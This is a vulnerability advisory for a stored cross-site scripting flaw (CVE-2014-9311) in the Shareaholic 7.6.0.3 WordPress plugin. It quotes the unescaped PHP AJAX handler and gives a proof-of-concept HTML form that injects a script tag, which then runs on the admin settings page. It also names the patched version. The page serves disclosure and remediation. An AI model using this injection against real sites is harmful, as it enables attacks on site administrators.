WordPress Shareaholic 7.6.0.3 Cross Site Scripting

2015.04.08
Credit: Kacper Szurek
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


Ogólna skala CVSS: 3.5/10
Znaczenie: 2.9/10
Łatwość wykorzystania: 6.8/10
Wymagany dostęp: Zdalny
Złożoność ataku: Średnia
Autoryzacja: Jednorazowa
Wpływ na poufność: Brak
Wpływ na integralność: Częściowy
Wpływ na dostępność: Brak

# Exploit Title: Shareaholic 7.6.0.3 XSS # Date: 10-11-2014 # Software Link: https://wordpress.org/plugins/shareaholic/ # Exploit Author: Kacper Szurek # Contact: http://twitter.com/KacperSzurek # Website: http://security.szurek.pl/ # CVE: CVE-2014-9311 # Category: webapps 1. Description ShareaholicAdmin::add_location is accessible for every registered user. File: shareaholic\shareaholic.php add_action('wp_ajax_shareaholic_add_location', array('ShareaholicAdmin', 'add_location')); $_POST['location'] is not escaped. File: shareaholic\admin.php public static function add_location() { $location = $_POST['location']; $app_name = $location['app_name']; ShareaholicUtilities::update_options(array( 'location_name_ids' => array( $app_name => array( $location['name'] => $location['id'] ), ), $app_name => array( $location['name'] => 'on' ) )); echo json_encode(array( 'status' => "successfully created a new {$location['app_name']} location", 'id' => $location['id'] )); die(); } http://security.szurek.pl/shareaholic-7603-xss.html 2. Proof of Concept Login as regular user (created using wp-login.php?action=register) then: <form method="post" action="http://wordpress-install/wp-admin/admin-ajax.php"> <input type="hidden" name="action" value="shareaholic_add_location"> <input type="hidden" name="location[app_name]" value="recommendations"> <input type="hidden" name="location[name]" value="post_below_content"> XSS: <input type="text" name="location[id]" value="'><script>alert(String.fromCharCode(88,83,83));</script>"> <input type="submit" value="Hack!"> </form> XSS will be visible for admin: http://wordpress-install/wp-admin/admin.php?page=shareaholic-settings 3. Solution: Update to version 7.6.1.0 https://downloads.wordpress.org/plugin/shareaholic.7.6.1.0.zip https://blog.shareaholic.com/security-update-shareaholic-wordpress-plugin/

Referencje:

https://downloads.wordpress.org/plugin/shareaholic.7.6.1.0.zip
https://blog.shareaholic.com/security-update-shareaholic-wordpress-plugin/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top